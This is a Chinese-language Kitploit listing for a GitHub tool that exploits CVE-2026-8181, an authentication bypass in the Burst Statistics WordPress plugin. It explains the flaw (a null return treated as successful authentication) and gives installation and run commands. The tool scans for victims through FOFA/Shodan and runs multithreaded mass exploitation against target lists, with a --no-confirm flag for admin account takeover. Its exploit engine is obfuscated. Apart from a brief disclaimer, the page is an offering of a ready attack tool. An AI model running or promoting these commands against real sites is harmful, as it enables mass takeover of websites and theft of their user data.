Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-8181 — CVE-2026-8181 — Burst Statistics WordPress 插件认证绕过(CVSS 9.8)导致管理员账户接管。集成 FOFA/Shodan 的批量扫描器,并配备现代化 GUI。 | Kitploit
工具/GitHubGitHub/hudzaifaharrantisi/cve-2026-8181
侦察漏洞扫描器漏洞利用Web应用程序漏洞利用信息收集渗透测试身份验证
GitHubhudzaifaharrantisi/cve-2026-8181

CVE-2026-8181

CVE-2026-8181 — Burst Statistics WordPress 插件认证绕过(CVSS 9.8)导致管理员账户接管。集成 FOFA/Shodan 的批量扫描器,并配备现代化 GUI。

查看仓库
111个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-8181 - Burst Statistics 身份验证绕过

CVSS 9.8(严重) — 身份验证绕过导致管理员账户接管

描述

CVE-2026-8181 是 WordPress 插件 Burst Statistics 版本 3.4.0 至 3.4.1.1 中的一个身份验证绕过漏洞。该插件被 200,000+ 个 WordPress 网站用作 Google Analytics 的隐私友好型替代分析方案。

该漏洞允许知道管理员用户名的未认证攻击者:

  • 在 1 个 HTTP 请求中获取管理员的应用程序密码
  • 实现完整的管理员账户接管
  • 创建新的管理员账户
  • 访问整个网站数据(包括 WooCommerce、用户数据等)
  • 安装恶意插件 / RCE

技术原因

class-mainwp-proxy.php 中的 is_mainwp_authenticated() 函数在验证 wp_authenticate_application_password() 的返回值时存在错误。该函数在 REST API 上下文之外调用时返回 null(而非 WP_Error),而代码仅检查了 is_wp_error()。由于 null 不是 WP_Error,身份验证被误认为成功。

工具功能

  • 现代 GUI — 深色主题、紧凑布局、3 个标签页(扫描、利用、日志)
  • 批量扫描器 — 通过 FOFA API、Shodan API 或文件列表搜索目标
  • 自动利用 — 多线程批量利用
  • CLI 模式 — 无需 GUI 即可运行,适用于自动化

环境要求

  • Python 3.11(必需 — .pyd 文件是为 Python 3.11 编译的)
  • Windows 10/11

安装与使用

root@kitploit:~
# 1. Clone repository
git clone https://github.com/YOUR_USERNAME/CVE-2026-8181.git
cd CVE-2026-8181

# 2. Install dependencies
py -3.11 -m pip install -r requirements.txt

# 3. Siapkan .env (untuk scan via FOFA / Shodan)
echo [email protected] > .env
echo FOFA_KEY=your_fofa_key >> .env
echo SHODAN_KEY=your_shodan_key >> .env

# 4. Jalankan (pilih salah satu):

#    Modern GUI (recommended)
py -3.11 gui_modern.py

#    Atau double-click run.bat
run.bat

#    Atau CLI langsung exploit satu target
py -3.11 CVE-2026-8181.py -t https://target.com -u admin --no-confirm

#    Atau exploit massal dari file
py -3.11 CVE-2026-8181.py -l targets_output.txt -u admin --no-confirm

#    Atau scan target dulu, baru exploit
py -3.11 finder.py --file list.txt
py -3.11 CVE-2026-8181.py -l targets_output.txt -u admin --no-confirm

分步教程

步骤 1:运行工具

双击 run.bat 或运行:

root@kitploit:~
py -3.11 gui_modern.py

Modern GUI Tools

CVE-2026-8181 现代 GUI 界面,包含 3 个标签页

步骤 2:扫描目标与利用

在 Scan 标签页:选择目标来源(来自 .env 的 FOFA/Shodan、文件或手动)→ 点击 SCAN TARGETS 在 Exploit 标签页:输入管理员用户名 → 点击 EXPLOIT

Hasil Scan CVE

工具发现易受攻击的目标并准备进行利用

步骤 3:访问 WordPress 管理员

如果利用成功,攻击者将获得管理员级别的完全访问权限:

WordPress Admin Dashboard

成功利用后的 WordPress 管理员仪表盘

文件结构

root@kitploit:~
CVE-2026-8181/
├── CVE-2026-8181.py          # Main exploit engine (PyArmor)
├── gui_modern.py             # Modern GUI wrapper (recommended)
├── finder.py                 # Target scanner (FOFA / Shodan / File)
├── run.bat                   # One-click launcher
├── requirements.txt          # Python dependencies
├── .env                      # API keys (gitignored)
├── .gitignore
├── Dork.txt                  # Google Dork
├── pyarmor_runtime_000000/   # PyArmor runtime (Python 3.11)
├── system/                   # Source modules (obfuscated)
└── img/                      # Screenshots tutorial
    ├── 1.png
    ├── 2.png
    └── 3.png

如何获取 API Key

FOFA (fofa.info)

  1. 在 https://fofa.info 注册
  2. 登录 → https://fofa.info/userInfo
  3. 复制邮箱和 API Key → 填入 .env

Shodan (shodan.io)

  1. 在 https://account.shodan.io/register 注册
  2. 登录 → https://account.shodan.io
  3. 复制 API Key → 填入 .env

CLI 选项(CVE-2026-8181.py)

免责声明

仅供教育和授权的渗透测试使用。 未经许可对不属于您的系统进行使用是违法的。请仅对您拥有或已获得书面授权的网站使用。

下载工具
Flag描述
-t, --target目标 URL(单个)
-l, --list包含目标列表的文件
-u, --username管理员用户名(默认:admin)
-T, --threads线程数(默认:10)
-o, --output结果输出文件
-v, --verbose调试输出
--timeout请求超时(秒)
--no-confirm跳过确认